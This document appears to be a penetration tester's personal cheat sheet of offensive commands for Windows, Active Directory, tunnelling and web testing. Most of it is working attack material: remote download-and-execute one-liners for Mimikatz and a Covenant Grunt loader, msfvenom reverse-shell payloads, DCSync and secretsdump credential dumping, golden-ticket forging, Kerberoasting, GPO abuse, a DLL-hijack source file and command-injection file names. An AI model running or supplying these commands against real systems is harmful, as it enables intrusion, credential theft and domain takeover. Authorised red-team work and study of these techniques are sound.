./chisel client 10.66.67.130:8000 R:8080:127.0.0.1:8080
./chisel client 10.10.10.10:8001 R:1080:socks

## Attacker Machine
./chisel server -p 8000 --reverse

# Add this in /etc/proxychains4.conf
socks5 127.0.0.1 1080

#!/bin/bash

for i in {1..255}; do 
        if out=$(ping -c 1 10.10.10.$i); then
                echo "$out" | grep ttl | cut -d " " -f4 | cut -d ":" -f1
                echo "$out" | grep ttl | cut -d " " -f4 | cut -d ":" -f1 >> ip.txt
        fi
done

# Downloads
https://github.com/RickdeJager/stegseek

# Commands
stegseek [stegofile.jpg] [wordlist.txt]
stegeek a.jpg rockyou.txt

# Download/Install
https://github.com/ReFirmLabs/binwalk
sudo apt-get install -y binwalk

# Commands
binwalk --signature firmware.bin
binwalk -A firmware.bin

# References
- https://github.com/ReFirmLabs/binwalk/wiki/Usage

#options (-t)
=> crunch 5 5 -t @@@@@ -o alphabet.txt
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols

# Download
https://github.com/hashcat/kwprocessor

# Commands
./kwp basechar.txt keymap.txt route.txt
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route

# Download
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

# Usage
.\procdump64.exe -accepteula
.\procdump64.exe -ma <PID>

# Command
hashcat -m 3200 hash wordlist.txt -r best64.rule
hashcat -m 1000 hash wordlist.txt -r all4one.rule --show --username

# Github
https://github.com/aaronjones111/cauldera

# Command

======AWS CLI======
# Install

# Commands
aws s3 ls s3://bucketname
aws s3 cp file.txt s3://bucketname
aws s3 rm s3://bucketname/file.txt
aws s3 ls s3://bucketname/ --no-sign-request --region cn-northwest-1
aws s3 mv file.txt s3://bucketname
aws s3 cp s3://bucketname/file.txt . --no-sign-request --region cn-northwest-1

# References
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/AWS%20Amazon%20Bucket%20S3/README.md

# Download
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1

# Get File from Victim Machine
wget http://10.10.14.16:80/PrivescCheck.ps1 -outfile PrivescCheck.ps1

# Commands
. .\PrivescCheck.ps1
Invoke-PrivescCheck

# Directly
IEX(IWR http://10.10.10.10/PrivescCheck.ps1 -UseBasicParsing); Invoke-PrivescCheck

# Downloads
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

# Commands
$c = "C:/patho/execute.dll"
$PEBytes = [IO.File]::ReadAllBytes($c)
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local

# Download
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

# Commands
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -i systeminfo.txt -d 2021-04-23-mssb.xls

=====List
.\Listdlls64.exe dllhijackservice

# References
https://docs.microsoft.com/en-us/sysinternals/downloads/

# Download
https://github.com/411Hall/JAWS.git

# Commands
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/jaws-enum.ps1')
. .\jaws-enum.ps1

# Commands
davtest -url http://10.10.10.15
cadaver http://10.10.10.15/   
	* put shell.txt
	* move shell.txt shell.aspx

# Install
pip3 install threader3000

# Commands
threader3000

# One Liner
for i in $(cat ip.txt); do echo "["$i"]" >> port.txt; echo "" >> port.txt;echo $i | threader3000 | grep "open" >> port.txt; echo "" >> port.txt;done

# References
- https://github.com/dievus/threader3000

# Download
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

# Usage
Seatbelt.exe -group=all

# SMB
- Create one folder name profile (mkdir profile)
- sudo /opt/Tools/impacket/examples/smbserver.py items profile
- net view \\10.10.10.10
- copy items.db \\10.10.10.10\ITEMS\items.db

# References
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

# Download
https://github.com/unode/firefox_decrypt.git

# Usage
- Ensure that these files in the folder
	* logins.json
	* cookies.sqlite
	* key4.db
	* cert9.db
- python3 firefox_decrypt.py /opt/Training/Gatekeeper/profile

# Pdf2john
perl /usr/share/john/pdf2john.pl example.pdf > hash

# Commands
john hash --wordlist=rockyou.txt
john hash --show

# FoxyProxy
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

# X-Forwarded For Injector
https://addons.mozilla.org/en-US/firefox/addon/x-forwarded-for-injector/

# Commands
sshuttle -vr [email protected] 192.168.0.1/24
sshuttle -vr [email protected] -e "ssh -i id_rsa" 192.168.0.1/24
sshuttle -vr [email protected] 192.168.0.1/16

# Downloads/Install
https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-linux?view=powershell-7.1

# Downloads
https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

# Commands
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
Invoke-Mimikatz -DumpCreds

# Run
.\mimikatz.exe

# Commands

# References
https://github.com/gentilkiwi/mimikatz/releases

# Download
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

# Commands
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | out-file hash.txt -Width 8000

# Commands
/usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe

=> Download
$ https://github.com/phra/PEzor

=> Commands
$ sudo bash install.sh
$ ./PEzor.sh -format=exe mimikatz.exe -z 2 -p '"lsadump::dcsync /domain:spookysec.local /user:krbtgt" "exit"'
$ ./PEzor.sh -format=exe mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

=> References
$ 

========Unquoted Service Path========
-> Check if there is quote or not (")
-> Check if the directory is writable or not
-> Check if the service can be restart or not.
wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
icacls "C:\Program Files\Unquoted Path Service\Common Files"
sc query "unquotedsvc"
accesschk.exe -ucqv unquotedsvc
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=9001 -f exe > Common.exe
sc stop unquotedsvc
sc start unquotedsvc
sc qc unquotedsvc

## Unquoted Service Path (Mitigate)
Get-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc
(Get-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc).ImagePath
Set-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc -Name ImagePath -Value '"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe"'
sc config unquotedsvc binPath= "\"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe\""

## References (Unquoted Service Path)
https://www.techiessphere.com/2017/06/how-to-fix-unquoted-service-path-vulnerability.html?m=1
https://github.com/VectorBCO/windows-path-enumerate/

========Dll Hijacking========
-> Check if there is a missing Dll which cannot be loaded (NAME NOT FOUND)
-> Check if the path to the Dll is writable or not
-> Check if the service can be restart or not.
wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\"
sc query dllsvc
sc queryex dllsvc
sc stop dllsvc
sc start dllsvc
taskkil /F /PID /8080

## windows_dll.c
#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\imhere.txt");
        ExitProcess(0);
    }
    return TRUE;
}

# x86
i686-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

# x64
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

## References (Dll Hijacking)
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking

========Service binPath========

## References (Changing Service Configuration)
https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions

========Others========

# References
https://gist.github.com/sckalath/8dacd032b65404ef7411
https://github.com/ankh2054/windows-pentest

# Download
https://github.com/theevilbit/ciscot7

# Usage
python3 ciscot7.py -p "0242114B0E143F015F5D1E161713"

# Example Password Encrypted
0242114B0E143F015F5D1E161713

=> User Enumeration
$ https://www.vaadata.com/blog/user-enumerations-on-web-applications/
$ https://www.rapid7.com/blog/post/2017/06/15/about-user-enumeration/

=> Directory Listing
$ https://cwe.mitre.org/data/definitions/548.html

=> File upload
$ https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

=> SQL Injection
$ https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
$ https://owasp.org/www-community/attacks/SQL_Injection
$ https://portswigger.net/web-security/sql-injection

=> Sensitive Information
$ https://cwe.mitre.org/data/definitions/200.html
$ https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure
$ https://cwe.mitre.org/data/definitions/359.html
$ https://cyberintelligencehouse.com/exposure/disclosure-of-sensitive-information-and-exposure-enables-phishing
$ https://portswigger.net/web-security/information-disclosure

=> Zip Password
$ https://github.com/jingleyang/security_ctf/blob/master/hacking-lab.com/5020%20Password%20protected%20ZIP%20Writeup.md

=> Local File Inclusion (LFI)
$ https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
$ https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/
$ https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/

=> Source Code Disclosure
$ https://portswigger.net/kb/issues/006000b0_source-code-disclosure
$ https://www.acunetix.com/blog/articles/source-code-disclosure-dangerous/

# RCE in Filename
file$(whoami).jpg
file`whoami`.jpg
file;sleep 30;.jpg

# References
https://www.onsecurity.io/blog/file-upload-checklist/
https://book.hacktricks.xyz/pentesting-web/file-upload

=> Find Vulnerable GPO (Using PowerView)
$ Get-DomainObjectAcl -Identity "GPOName" -ResolveGUIDs |  Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}
$ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
$ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name | ?{($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}}

=> Abuse Using SharpGPOAbuse
$ https://github.com/FSecureLABS/SharpGPOAbuse
$ .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author bank.local\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -e <BASE64>" --GPOName "Vulnerable GPO"
$ .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author bank.local\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators nik /add" --GPOName "Vulnerable GPO"
$ .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount nik --GPOName "Vulnerable GPO"
$ gpupdate /force

=> References
$ https://book.hacktricks.xyz/windows/active-directory-methodology/acl-persistence-abuse#abusing-weak-gpo-permissions
$ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#exploit-group-policy-objects-gpo

=> Find Group Membership
$ (Get-WmiObject -Class Win32_GroupUser | where-object {$_.PartComponent -match "SQLAadmin"} | %{[wmi]$_.GroupComponent}).Caption

=> Find Domain Controllers
$ [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain().DomainControllers.Name

=> List Domain Computer
$ Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn
$ (Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn).Count

=> References
$ https://mlcsec.com/active-directory-domain-enumeration-part-2/
$ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

=> Commands
$ cmdkey /list

=> taskkill
$ taskkil /F /PID 8071

=> sc 
$ sc qc servicename
$ sc queryex servicename
$ sc stop serviceanme
$ sc start servicename
$ sc query servicename

=> Find File Recursive
$ dir *flag* /s /b

=> winrs
$ winrs.exe -r:WEB01APP hostname

=> Change Password User
$ net user Administrator Passw0rd@123!

=> Dump process or pid
$ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full
$ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] \\10.10.10.10\public\dump.bin full

=> References
$ https://www.vincentyiu.com/red-team-tips
$ https://vysecurity.rocks/
$ https://herrscher.info/index.php/2021/04/11/red-teaming-guide/
$ http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
$ https://www.exploit-db.com/docs/48282
$ https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

# Download
https://github.com/GhostPack/Rubeus

# Commands
.\Rubeus.exe asreproast  /format:hashcat /outfile:ou.txt
.\Rubeus.exe kerberoast /outfile:ou.txt
.\Rubeus.exe asktgs /ticket:<base64.txt> /service:MSSQL\DC01.MEGACORP.LOCAL
.\Rubeus.exe hash /user:nik /domain:BANK /password:password
.\Rubeus dump
	* [IO.File]::WriteAllBytes("C:\users\administrator\downloads\ticket.kirbi", [Convert]::FromBase64String("<base64 longer>"))
	* .\Rubeus.exe ptt /ticket:ticket.kirbi
	* .\PsExec64.exe -accepteula \\bank.local -u nikk cmd 
.\Rubeus.exe s4u /user:nk /rc4:238F7038FD4BBC3293D8E75566DF4D65 /impersonateuser:administrator /msdsspn:"MSSQL/DC01.BANK.LOCAL" /altservice:cifs,http,host,mssql,mssqlsvc,ldap,krbtgt /ptt
.\Rubeus.exe dump /nowrap
    * [IO.File]::WriteAllBytes("C:\users\nik\downloads\cifs.kirbi", [Convert]::FromBase64String("<BASE64>"))
    * ticketConverter.py cifs.kirbi cifs.ccache

# Dotnet Install/Download
https://dotnet.microsoft.com/download/dotnet/3.1

# Commands
ImpersonateProcess 1776
ImpersonateProcess <PID>
PortScan 192.168.20.10 10-2000

# Chisel
- shell C:\windows\tasks\chisel_windows.exe client 10.10.10.10:8000 R:1080:socks
	* Edit /etc/proxychains4.conf => socks5  127.0.0.1 1080

# Rubeus
- Rubeus kerberoast admin hashcat
- Rubeus klist

# Import Powershell
- PowerShellImport 
- Choose file

# Powerview
- Powershell Get-DomainUser -TrustedToAuth

# PowerMad
- Powershell Resolve-DNSName NoDNSRecord
- Powershell New-ADIDNSNode -Node * -Verbose
- Powershell grant-adidnspermission -node * -principal "Authenticated Users" -Access GenericAll -Verbose

# Invoke-DNSUpdate
- Powershell Invoke-DNSupdate -DNSType A -DNSName * -DNSData 10.10.10.10 -Verbose

# Inveigh
- Powershell Invoke-InveighRelay -ConsoleOutput -Y -StatusOutput N -Command "net user commandtest Passw0rd123! /add" -Attack Enumerate,Execute,Session
- Powershell Invoke-Inveigh -ConsoleOutput Y
- Powershell Stop-Inveigh
- Powwershell Invoke-Inveigh -FileOutput Y

# Load Grunt (Load Assembly)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/grunt.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[GruntStager.GruntStager]::Main("".Split())

# Impersonate 
getsystem

=> Install
$ sudo apt-get install android-tools-adb android-tools-fastboot

=> Commands
$ adb devices
$ adb shell
$ adb -s localhost:5555 shell

# Command


# References
https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1

# Install
GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx

=> Ways
$ script -qc /bin/bash /dev/null
$ python -m 'import pty;pty.spawn("/bin/bash"))'
$ python3 -m 'import pty;pty.spawn("/bin/bash"))'
$ Ctrl + z @ stty -raw echo;fg

# Socat
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
socat tcp-listen:8080,reuseaddr,fork tcp:localhost:8080

# Meterpreter
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>

# Chisel
## Client Machine
./chisel client 10.66.67.154:8000 R:25:127.0.0.1:25
./chisel client 10.66.67.130:8000 R:8080:127.0.0.1:8080
./chisel client 10.10.10.10:8001 R:1080:socks

## Attacker Machine
./chisel server -p 8000 --reverse

# References
-> https://book.hacktricks.xyz/tunneling-and-port-forwarding

=> GetNPUsers.py (AsrepRoasting)
$ GetNPUsers.py -dc-ip 10.10.10.10 -request 'bank.local/' -no-pass -usersfile user.txt -format hashcat
 mode 18200

=> GetUserSPNs.py (Kerberoasting)
$ GetUserSPNs.py bank.local/nik:'Password@123!' -dc-ip 10.10.10.10 -request -outputfile output.txt

=> GetADUsers.py
$ GetADUsers.py -all bank.local/nik:'Password@123!'-dc-ip 10.10.10.10

=> secretsdump.py
$ export KRB5CCNAME=Administrator.ccache
$ secretsdump.py -k DC01.bank.local -just-dc
$ secretsdump.py -just-dc bank.local/nik:'Password@123!'@10.10.10.10
$ secretsdump.py -ntds ntds.dit -system system local
$ secretsdump.py -ntds ntds.dit -system system local -history
$ secretsdump.py -sam SAM -system SYSTEM local
$ secretsdump.py -ntds ntds.dit -system system.hive local -outputfile dump.txt
$ secretsdump.py bank.local/Administrator@BANK -target-ip 10.10.10.10  -hashes aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460

=> getST.py
$ getST.py -spn MSSQL/DC01.BANK.LOCAL 'BANK.LOCAL/nik:password' -impersonate Administrator -dc-ip 10.10.10.10
$ getST.py -spn MSSQL/DC01.BANK.LOCAL 'BANK.LOCAL/nik' -impersonate Administrator -dc-ip 10.10.10.10 -hashes ':2182eed0101516d0ax06b98c579x65e6'

=> getTGT.py
$ getTGT.py -dc-ip 10.10.10.10 bank.local/nik:'Passw0rd@123!'

=> wmiexec.py
$ export KRB5CCNAME=Administrator.ccache;
$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0405e42853c0f2cb0454964601f27bae [email protected]
$ wmiexec.py -hashes :0405e42853c0f2cb0454964601f27bae [email protected]
$ wmiexec.py bank.local/[email protected] -k -no-pass

=> psexec.py
$ export KRB5CCNAME=Administrator.ccache
$ psexec.py BANK\A[email protected] -hashes 'aad3b435b51404eeaad3b435b51404ee:2182eed0101516d0ax06b98c579x65e6'
$ psexec.py bank.local/nik:'Password@123'@10.10.10.10
$ psexec.py -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -no-pass -k bank.local/[email protected]
$ psexec.py bank.local/[email protected] -k -no-pass

=> smbclient.py
$ export KRB5CCNAME=Administrator.ccache;
$ smbclient.py bank.local/nik:'Password@123'@10.10.10.10
$ smbclient.py bank.local/[email protected] -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -no-pass -k
$ smbclient.py bank.local/[email protected] -no-pass -k
$ shares
$ ls
$ cd ..
$ cat flag.txt

=> mssqlclient.py
$ mssqlclient.py  -windows-auth bank.local/aniq:'Password@123'@10.10.10.10

=> ticketConverter.py
$ ticketConverter.py cifs.kirbi cifs.ccache

=> ticketer.py (Golden Tick)
$ ticketer.py -domain bank.local -nthash <KRBTGT_HASH> -dc-ip 10.10.10.10 -domain-sid <DOMAIN_SID> <USER>
$ ticketer.py -domain bank.local -nthash 4e48ce125611add31a32cd79e529964b -dc-ip 10.10.10.10 -domain-sid S-1-5-21-3750359090-2939318659-876128439 lolol

=> lookupsid.py
$ lookupsid.py Administrator:[email protected]
$ lookupsid.py bank.local/[email protected] -hashes ':32db622ed9c00dd1039d8288b0407460'

=> References
$ https://www.hackingarticles.in/abusing-kerberos-using-impacket/

=> Commands
git status
git pull
git add .
git commit -m "Update"
git push
git stash
git stash list
git stash show -p "stash@{0}"
git stash apply "stash@{0}"

# Install 
pip3 install -U objection 

# Commands 
- objection patchapk --source base.apk 
- objection patchapk --source base.apk -a arm64
- adb install base.objection.apk 
- objection -g com.app.yes explore 
- objection explore (Make sure to open the application first in our mobile phone before run) 

#==Android==
* android sslpinning disable 

#==Ios==
* ios sslpinning disable

# References 
- https://gowthamr1.medium.com/android-ssl-pinning-bypass-using-objection-and-frida-scripts-f8199571e7d8 
- https://github.com/sensepost/objection/tree/master/objection/console/helpfiles
- https://rehex.ninja/posts/frida-cheatsheet/
- https://cheatography.com/hnd/cheat-sheets/objection-ios/

# Download
https://github.com/pwntester/ysoserial.net

# Commands
##==Json.Net==
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell curl http://10.10.10.10/"

# Install
- https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52583

# References
- https://gist.github.com/lanmaster53/3d868369d0ba5144b215921d4e11b052
- https://github.com/PortSwigger/python-scripter

=> Extensions List
$ https://github.com/snoopysecurity/awesome-burp-extensions#xxe
$ https://portswigger.net/solutions/penetration-testing/penetration-testing-tools

=> Download
$ https://github.com/SpiderLabs/Responder

=> Configuration Location
$ /etc/responder/Responder.conf

=> Commands
$ sudo responder -I tun0 -rdwv

=> Download
$ https://github.com/micahvandeusen/gMSADumper

=> Commands
$ python3 gMSADumper.py -u 'nik' -p 'Passw0rd@123!'' -d bank.local

=> References
$ https://docs.microsoft.com/en-us/windows/win32/adschema/a-msds-managedpasswordid
$ https://github.com/n00py/LAPSDumper/
$ https://github.com/micahvandeusen/gMSADumper

=> Download
$ https://github.com/dirkjanm/krbrelayx

=> printerbug.py
$ Simple tool to trigger SpoolService bug via RPC backconnect
$ 

=> addspn.py
$ Add an SPN to a user/computer account
$ 

=> dnstool.py
$ Query/modify DNS records for Active Directory integrated DNS via LDAP
$ .\dnstool.py -u BANK\\nik -p 'Passw0rd@123!' -r web01.bank.local -d 10.10.10.12 --action add 19.10.10.10

=> krbrelayx.py
$ Kerberos "relay" tool. Abuses accounts with unconstrained delegation to pwn
things.

=> References
https://github.com/dirkjanm/krbrelayx

# Commands
.\VboxMange.exe -nologo guestcontrol "Docker" run -exe "/bin/bash" --username "nik" --password "password123" --wait-stdout -- bash -c '/usr/bin/echo "oassword123" | sudo -S cat /etc/passwd 2>/dev/null'

# Download server side certificate (Browser)
- Click on the Lock icon in the url row > Show Connection Details > More Information > View Certificate > Download PEM (cert) > Save it as .crt

# Check
openssl pkey -in ca.key -pubout | md5sum
openssl x509 -in lacasadepapel-htb.crt -pubkey -noout | md5sum

- This will give the same md5sum output which is => 71e2b2ca7b610c24d132e3e4c06daf0c

# Generate private key for SSL client
openssl genrsa -out client.key 4096

# Generate cert request
openssl req -new -key client.key -out client.req

# Issue client certificate
openssl x509 -req -in client.req -CA lacasadepapel-htb.crt -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer

# Convert to pkcs#12 format (Browser)
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

# Clean (optional)
rm client.key client.cer client.req

# References
https://www.makethenmakeinstall.com/2014/05/ssl-client-authentication-step-by-step/

# Commands
net user /domain
net group /domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# LDAP
======script(domain)======
$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$Pdc = ($domainObject.PdcRoleOwner).Name
$searchString = "LDAP://"
$searchString += $Pdc + "/"
$Name = "DC=$($domainObject.Name.Replace('.', ',DC='))"
$searchString += $Name
$search = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchString)
$objectDomain = New-Object System.DirectoryServices.DirectoryEntry
$search.SearchRoot = $objectDomain
$search.filter="samAccountType=805306368"
$res = $search.FindAll() | Sort-Object path
==================

======script(Local)=====
$Searcher = New-Object DirectoryServices.DirectorySearcher
$Searcher.SearchRoot = 'LDAP://CN=Users,DC=bank,DC=local'
$Searcher.Filter = '(&(objectCategory=person))'
$res = $Searcher.FindAll()  | Sort-Object path
===================

# LDAP References
https://gist.github.com/Erreinion/76660c012ad05ab90182

# .Net Method
=====ADForestInfo====
$ADForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
$ADForestInfo.Name
$ADForestInfo.Sites
$ADForestInfo.Domains
$ADForestInfo.GlobalCatalogs
$ADForestInfo.ApplicationPartitions
$ADForestInfo.ForestMode
$ADForestInfo.RootDomain
$ADForestInfo.Schema
$ADForestInfo.SchemaRoleOwner
$ADForestInfo.NamingRoleOwner
OR
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Name
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Domains
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().GlobalCatalogs
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().ApplicationPartitions
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().ForestMode
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().RootDomain
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Schema
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().SchemaRoleOwner
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().NamingRoleOwner
=====================


# .Net Method References
https://adsecurity.org/?p=113

# Install
go get github.com/tomnomnom/waybackurls

# Commands
cat comain.txt| waybackurls > wayback.txt

# Download
GO111MODULE=on go get -u -v github.com/lc/gau

# References
https://github.com/lc/gau

# Download/Install
sudo apt install assetfinder

# Download/Install
GO111MODULE=on go get -v github.com/hahwul/dalfox/v2

# References
https://github.com/hahwul/dalfox

=> Download
$ iex(iwr -usebasicparsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1))

=> Command
$ Invoke-AllChecks
$ Find-ProcessDLLHijack

=> References
$ https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

=> References
$ https://github.com/RedTeamOperations/Vulnerable_Machine/blob/master/Escalate%20-%20A%20Windows%20Vulnerable%20Virtual%20Machine
$ https://github.com/Tib3rius/Windows-PrivEsc-Setup

=> References
$ https://github.com/RedTeamOperations/Vulnerable_Machine/blob/master/Escalate%20-%20A%20Linux%20Vulnerable%20Virtual%20Machine

=> Commands
$ Invoke-InveighRelay -ConsoleOutput -Y -StatusOutput N -Command "net user commandtest Passw0rd123! $ /add" -Attack Enumerate,Execute,Session
$ Invoke-Inveigh -ConsoleOutput Y
$ Stop-Inveigh
$ Invoke-Inveigh -FileOutput Y

=> Download
$ https://www.tenable.com/downloads/nessus

=> Install
$ sudo apt install ./Nessus-8.14.0-debian6_amd64.deb

=> Start
$ sudo /bin/systemctl start nessusd.service

=> Stop
$ sudo /bin/systemctl stop nessusd.service

=> Web
$ https://localhost:8834/

=> No PDF?
$ Install Java on the machine 
$ Follow the steps in here : https://community.tenable.com/s/article/PDF-Option-is-Missing-in-Nessus

# Download 
https://github.com/Apr4h/CobaltStrikeScan

# Commands 
python3 parse_beacon_config.py beacon.exe

# Information we can get
- SleepTime
- Jitter
- PublicKey_MD5
- Port
- BeaconType
- HttpPostUri
- Many more

# Download
https://github.com/aniqfakhrul/Sharperner

# Commands
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f base64
.\Sharperner.exe /file:base64.txt /key:'nothinghere' /out:payload.exe

[Install truffleHog]
pip install truffleHog

[Usage]
trufflehog --regex --entropy=False https://github.com/example/example.git

[References]
https://github.com/trufflesecurity/truffleHog

=> Download
$ https://github.com/GhostManager/Ghostwriter

=> =====Take Substring=====
$ {{ finding.title[1:6] }}
$ {{ finding.title[1:-1] }}
$ {{ finding.title[1:] }}

=> =====Set List=====
$ {% set list_web = ['WEB01','WEB02'] %} 

=> =====Example(1) Iteration=====
{% for x in list_web %}
	{{ x }}
{% endfor %}

=> ====Example(2) Iteration====
{% for x in list_web %}
    {{ forloop.counter }} # starting index 1
    {{ forloop.counter0 }} # starting index 0
{% endfor %}

=> =====Example(1) IfElse=====
{% if 'web' in x %}
	yes
{% endif %}

=> ====Inside findings====
$ https://github.com/GhostManager/Ghostwriter/blob/ee24eb299c0e66b6b718eb3ecf5f084685b526f0/ghostwriter/reporting/models.py
{% for findings in findings %}
	{{ finding.title }}
	{{ finding.position }}
	{{ finding.affected_entities }}
	{{ finding.description }}
	{{ finding.impact }}
	{{ finding.mitigation }}
	{{ finding.replication_steps }}
	{{ finding.host_detection }}
	{{ finding.network_detection }}
	{{ finding.references }}
	{{ finding.finding_guidance }}
	{{ finding.complete }}
	# Foreign Keys
	{{ finding.severity }}
	{{ finding.finding_type }}
	{{ finding.report }}
{% endfor % }

=> ====Inside target====
$  https://github.com/GhostManager/Ghostwriter/blob/ee24eb299c0e66b6b718eb3ecf5f084685b526f0/ghostwriter/rolodex/models.py
{% for targets in target %}
	{{ targets.ip_address }}
	{{ targets.hostname }}
	{{ targets.note }}
	{{ targets.compromised }}
	# Foreign Keys
	{{ targets.project }}
{% endfor % }

# Split By Whitespace and append every end words
passPhrase = "aa bb cc dd ee ff";
passPhrase = string.Join("\"" + Environment.NewLine + "\"", passPhrase.Split()
	.Select((word, index) => new { word, index })
	.GroupBy(x => x.index / 2)
	.Select(grp => string.Join(" ", grp.Select(x => x.word))));
	

=> Tools
$ https://github.com/lobuhi/byp4xx
  -> ./byp4xx.sh -c "http://localhost/"
$ https://github.com/iamj0ker/bypass-403

=> Header
$ X-Originating-IP: 127.0.0.1 
$ X-Forwarded-For: 127.0.0.1 
$ X-Remote-IP: 127.0.0.1 
$ X-Remote-Addr: 127.0.0.1
$ X-Original-URL: /admin
$ X-Rewrite-URL: /admin

# Download
https://github.com/MobSF/mobsfscan

# Commands
